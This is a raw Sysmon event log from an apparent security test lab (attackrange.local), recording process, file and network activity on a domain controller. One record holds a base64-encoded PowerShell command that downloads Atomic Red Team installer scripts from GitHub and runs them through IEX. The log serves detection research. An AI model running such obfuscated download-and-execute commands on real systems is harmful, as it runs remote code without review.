15:52:19.631{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003829Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.631{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003828Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.631{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003827Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.631{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003826Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.631{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CB3-5FA1-BF00-000000008801}4316C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003825Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.631{D28789B6-7CB3-5FA1-BE00-000000008801}27484492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{D28789B6-7CB3-5FA1-BF00-000000008801}4316C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003824Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.641{D28789B6-7CB3-5FA1-BF00-000000008801}4316C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES5138.tmp" "c:\Users\Administrator\AppData\Local\Temp\344h0a0w\CSCAA9980F47AFF45EC83A2D47F88EE87BE.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CB0-5FA1-8346-070000000000}0x746830HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{D28789B6-7CB3-5FA1-BE00-000000008801}2748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\344h0a0w\344h0a0w.cmdline" 10341000x80000000000000003823Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.568{D28789B6-7CB0-5FA1-B600-000000008801}12524136C:\Windows\system32\conhost.exe{D28789B6-7CB3-5FA1-BE00-000000008801}2748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003822Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.568{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003821Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.568{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003820Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.568{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003819Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.568{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003818Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.568{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003817Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.568{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003816Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.568{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003815Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.568{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003814Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.568{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CB3-5FA1-BE00-000000008801}2748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003813Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.568{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003812Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.568{D28789B6-7CB1-5FA1-BD00-000000008801}45122820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CB3-5FA1-BE00-000000008801}2748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\f0ead6fa30602f351c05c321f84071ac\Microsoft.PowerShell.Commands.Utility.ni.dll+e49f97fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\f0ead6fa30602f351c05c321f84071ac\Microsoft.PowerShell.Commands.Utility.ni.dll+e49f97fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312083cc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64) 154100x80000000000000003811Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.569{D28789B6-7CB3-5FA1-BE00-000000008801}2748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\344h0a0w\344h0a0w.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CB0-5FA1-8346-070000000000}0x746830HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAEkAbgB0AGUAcgBuAGUAdAAgAEUAeABwAGwAbwByAGUAcgBcAE0AYQBpAG4AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBGAGkAcgBzAHQAUgB1AG4AQwB1AHMAdABvAG0AaQB6AGUAIgAgAC0AVgBhAGwAdQBlACAAMgAKAEkARQBYACAAKABJAFcAUgAgAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcgBlAGQAYwBhAG4AYQByAHkAYwBvAC8AaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAC8AbQBhAHMAdABlAHIALwBpAG4AcwB0AGEAbABsAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAuAHAAcwAxACkACgBJAG4AcwB0AGEAbABsAC0AQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQAgAC0ARgBvAHIAYwBlAAoASQBFAFgAIAAoAEkAVwBSACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAHIAZQBkAGMAYQBuAGEAcgB5AGMAbwAvAGkAbgB2AG8AawBlAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAvAG0AYQBzAHQAZQByAC8AaQBuAHMAdABhAGwAbAAtAGEAdABvAG0AaQBjAHMAZgBvAGwAZABlAHIALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAAoASQBuAHMAdABhAGwAbAAtAEEAdABvAG0AaQBjAHMARgBvAGwAZABlAHIAIAAtAEYAbwByAGMAZQAgAC0AUgBlAHAAbwBPAHcAbgBlAHIAIAAiAHMAcABsAHUAbgBrACIAIAAtAEIAcgBhAG4AYwBoACAAIgBsAG8AYwBhAGwALQBtAGEAcwB0AGUAcgAiAA== 11241100x80000000000000003810Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.553{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\344h0a0w\344h0a0w.cmdline2020-11-03 15:52:19.553 11241100x80000000000000003809Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:19.553{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\344h0a0w\344h0a0w.dll2020-11-03 15:52:19.553 354300x80000000000000003808Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.544{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50321-false151.101.112.133-443https 11241100x80000000000000003807Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.349{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\install-atomicsfolder.ps12020-11-03 15:52:19.349 11241100x80000000000000003806Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.333{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\install-atomicredteam.ps12020-11-03 15:52:19.333 